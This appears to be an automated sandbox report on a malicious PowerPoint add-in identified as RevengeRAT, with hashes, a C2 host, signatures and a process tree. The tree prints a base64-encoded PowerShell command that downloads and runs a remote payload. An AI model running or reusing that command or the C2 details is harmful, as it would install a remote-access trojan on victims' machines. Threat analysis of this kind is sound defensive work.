Analysis

  • max time kernel
    136s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2023 19:12

General

  • Target

    bee2pay Authy.ppam

  • Size

    17KB

  • MD5

    515ff2344f241cfdb65a08b0c6fa90f9

  • SHA1

    36b640ba2e0c9b6da14364e4b24a960b964b8377

  • SHA256

    f918fb220166f75e3bd9f8cd162b411bfd9ba210f4abe0f9509c5a7bf722a981

  • SHA512

    796fd73c9820ff56456deab07219ad29a25c8231d3c3fe60b2aa73ef3392f548e76eef12256f52a3aa447e251004153cb2c85c01bfda57d758a2a04c52aca44e

  • SSDEEP

    384:dXPgOGHYbeUPGocggolFNXy82T4XIERqzmhb:VPpGHYfGTggol7O44nzW

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

m7.ddns.com.br:5222

Mutex

30c2ac3031a0

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\bee2pay Authy.ppam" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcABzADoALwAvAGQAYwA0ADQANAAuADQAcwB5AG4AYwAuAGMAbwBtAC8AZABvAHcAbgBsAG8AYQBkAC8AWQBlAEEASwBaAFAARABGAC8AUgBFAFYARQBOAEcARQBSAC4AagBwAGcAPwBkAHMAaQBkAD0AdgBkAGcASQBTAHYAbAB3AC4ANgAyADkAYwBiAGQAZgA3ADUAOQAxAGYAOAA5ADIANwAyADMAYQA4AGUANgA0ADAANABlADcANAA3ADgAOQA0ACYAcwBiAHMAcgA9AGIAYgA5ADMAZgA0AGEANgA3AGIANQBlAGQAZAA3AGEANgAwADcANgBiAGQAYgBkADIAZgA1ADAAOABmAGIANABhAGQAZgAmAGIAaQBwAD0ATQBUAGcAMQBMAGoARQAxAE0AeQA0AHgATgB6AFkAdQBNAGoASQAmAGwAZwBmAHAAPQA0ADAADQAKACcAKQA7ACAADQAKAEkAdwBTAFcAWABwAHYAegB0AG4ARABYAHUARgBTAEYARQBlAE8AYQBSAFUATAB2AGQASQBlAFAARwB5AGkASQBiAGgAYQBYAHMATwBTAGsAYgBXAGIAeQBTAEUAYgB3AGMAWgBGAFkADQAKAA==""
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4312
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Checks processor information in registry
        PID:2212

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

3
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zd5b5av0.4hw.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1348-181-0x00007FFEAE470000-0x00007FFEAE480000-memory.dmp
    Filesize

    64KB

  • memory/1348-179-0x00007FFEAE470000-0x00007FFEAE480000-memory.dmp
    Filesize

    64KB

  • memory/1348-136-0x00007FFEAE470000-0x00007FFEAE480000-memory.dmp
    Filesize

    64KB

  • memory/1348-137-0x00007FFEAE470000-0x00007FFEAE480000-memory.dmp
    Filesize

    64KB

  • memory/1348-138-0x00007FFEAC110000-0x00007FFEAC120000-memory.dmp
    Filesize

    64KB

  • memory/1348-139-0x00007FFEAC110000-0x00007FFEAC120000-memory.dmp
    Filesize

    64KB

  • memory/1348-135-0x00007FFEAE470000-0x00007FFEAE480000-memory.dmp
    Filesize

    64KB

  • memory/1348-134-0x00007FFEAE470000-0x00007FFEAE480000-memory.dmp
    Filesize

    64KB

  • memory/1348-180-0x00007FFEAE470000-0x00007FFEAE480000-memory.dmp
    Filesize

    64KB

  • memory/1348-182-0x00007FFEAE470000-0x00007FFEAE480000-memory.dmp
    Filesize

    64KB

  • memory/1348-133-0x00007FFEAE470000-0x00007FFEAE480000-memory.dmp
    Filesize

    64KB

  • memory/2212-201-0x0000000005F00000-0x0000000005F66000-memory.dmp
    Filesize

    408KB

  • memory/2212-202-0x0000000005360000-0x0000000005370000-memory.dmp
    Filesize

    64KB

  • memory/2212-200-0x0000000005E60000-0x0000000005EFC000-memory.dmp
    Filesize

    624KB

  • memory/2212-199-0x0000000005360000-0x0000000005370000-memory.dmp
    Filesize

    64KB

  • memory/2212-198-0x0000000005810000-0x0000000005DB4000-memory.dmp
    Filesize

    5.6MB

  • memory/2212-195-0x0000000000400000-0x000000000040A000-memory.dmp
    Filesize

    40KB

  • memory/4312-162-0x000001371CC00000-0x000001371CC22000-memory.dmp
    Filesize

    136KB

  • memory/4312-186-0x000001371CF70000-0x000001371CF88000-memory.dmp
    Filesize

    96KB

  • memory/4312-192-0x000001371CF70000-0x000001371CF88000-memory.dmp
    Filesize

    96KB

  • memory/4312-188-0x000001371CF70000-0x000001371CF88000-memory.dmp
    Filesize

    96KB

  • memory/4312-194-0x000001371CF70000-0x000001371CF88000-memory.dmp
    Filesize

    96KB

  • memory/4312-184-0x000001371CF70000-0x000001371CF88000-memory.dmp
    Filesize

    96KB

  • memory/4312-183-0x000001371CF70000-0x000001371CF88000-memory.dmp
    Filesize

    96KB

  • memory/4312-190-0x000001371CF70000-0x000001371CF88000-memory.dmp
    Filesize

    96KB

  • memory/4312-165-0x000001371CBC0000-0x000001371CBD0000-memory.dmp
    Filesize

    64KB

  • memory/4312-164-0x000001371CBC0000-0x000001371CBD0000-memory.dmp
    Filesize

    64KB

  • memory/4312-163-0x000001371CBC0000-0x000001371CBD0000-memory.dmp
    Filesize

    64KB